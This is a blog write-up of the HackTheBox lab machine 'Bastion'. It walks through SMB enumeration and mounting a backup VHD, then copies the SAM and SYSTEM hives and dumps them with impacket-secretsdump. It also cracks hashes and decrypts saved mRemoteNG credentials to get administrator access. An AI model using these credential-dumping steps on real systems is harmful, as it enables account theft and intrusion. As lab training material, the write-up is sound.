Muzec's Cyber Security Blog

Hack. Sleep. Repeat

View on GitHub


We always start with an nmap scan…..

Nmap -sC -sV -oA nmap <Target-IP>

# Nmap 7.91 scan initiated Mon Jul  5 10:55:33 2021 as: nmap -sC -sV -oA nmap
Nmap scan report for
Host is up (0.46s latency).
Not shown: 996 closed ports
22/tcp  open  ssh          OpenSSH for_Windows_7.9 (protocol 2.0)
| ssh-hostkey: 
|   2048 3a:56:ae:75:3c:78:0e:c8:56:4d:cb:1c:22:bf:45:8a (RSA)
|   256 cc:2e:56:ab:19:97:d5:bb:03:fb:82:cd:63:da:68:01 (ECDSA)
|_  256 93:5f:5d:aa:ca:9f:53:e7:f2:82:e6:64:a8:a3:a0:18 (ED25519)
135/tcp open  msrpc        Microsoft Windows RPC
139/tcp open  netbios-ssn  Microsoft Windows netbios-ssn
445/tcp open  microsoft-ds Windows Server 2016 Standard 14393 microsoft-ds
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: 2h20m57s, deviation: 1h09m13s, median: 3h00m54s
| smb-os-discovery: 
|   OS: Windows Server 2016 Standard 14393 (Windows Server 2016 Standard 6.3)
|   Computer name: Bastion
|   NetBIOS computer name: BASTION\x00
|   Workgroup: WORKGROUP\x00
|_  System time: 2021-07-05T14:57:52+02:00
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2021-07-05T12:57:48
|_  start_date: 2021-07-05T04:32:51

Service detection performed. Please report any incorrect results at .
# Nmap done at Mon Jul  5 10:57:10 2021 -- 1 IP address (1 host up) scanned in 97.46 seconds

My second windows box on HackTheBox and would actually say am loving it so we are having some ports let start on eumerating SMB for some anonymous log shares.

└─$ smbclient -L // -N         

        Sharename       Type      Comment
        ---------       ----      -------
        ADMIN$          Disk      Remote Admin
        Backups         Disk      
        C$              Disk      Default share
        IPC$            IPC       Remote IPC
SMB1 disabled -- no workgroup available

Seems we have access to the backups share on SMB let connect to it.


We are in cool let get the note.txt first maybe we are left with a hint to keep going forward and we still have some juciy directories to check lol.

└─$ cat note.txt     
Sysadmins: please don't transfer the entire backup file locally, the VPN to the subsidiary office is too slow.

Cool? let try to check what the system admin was talking about so let enumerate the directories.

\\\Backups\WindowsImageBackup\L4mpje-PC\Backup 2019-02-22 124351\


Ok we have some cool files also a Virtual Hard Disk Image but the problem am facing is that it always disconnect when i try to get the file i think that what the system admin was talking about.


With some little research i was able to find a way to mount it on my Kali machine.

Mounting A VHD On Linux

First step is to install the tool sudo apt install libguestfs-tools -y

sudo mount -t cifs // /mnt -o user=,password=



So we have it mounted already cool. Now we need a directory that we need to use to mount the VHD file.

sudo mkdir /mnt/Vhd

Now we are going to use guestmount to mount the directory in read-only ro mode, and, use it with the folder we created /mnt/vhd .

sudo guestmount --add 9b9cfbc4-369e-11e9-a17c-806e6f6e6963.vhd --inspector --ro -v /mnt/vhd


It going to take sometime so we have to wait for it to be done maybe grab a cup of coffee.

sudo su
cd /mnt/vhd


Now we can try to check for interesting directories and files like dumping SAM database.

How To Extract Local SAM Database From VHD Files

Since we have mount the VHD on our Kali machine we can go ahead and dump SAM database that store credentials.

cd /Windows/System32/config
cp SAM SYSTEM /tmp


NOTE:- We can also grab nts.dit if we are on a domain controller so we can crack all of the AD hashes.

Now let change to the tmp directory.

cd /tmp
impacket-secretsdump -sam SAM -system SYSTEM local


Now that we have the hashes let try to crack it.


So i was able to crack L4mpje password hash now since we have SSH open let try it.


We are in now let get user.txt .



Time to get system i really have a tough time here since i know nothing about windows so i just peep at write up to know what am missing so that get me back on a track.


When I checked the user appdata I saw that mRemoteNG was installed on the box so i quickly google search about it.

mRemoteNG is a fork of mRemote: an open source, tabbed, multi-protocol, remote connections manager. mRemoteNG adds bug fixes and new features to mRemote.

It allows you to view all of your remote connections in a simple yet powerful tabbed interface.

mRemoteNG saves the connections info and credentials in a file called confCons.xml



Now we have administrator password but it encrypted let find a way to decrypt it.

git clone


python3 -s 


Username:- administrator
Password:- thXLHM96BeKL0ER2

Now we have credentials for administrator let hit SSH to get the root flag.


We are done.

Greeting From Muzec

Back To Home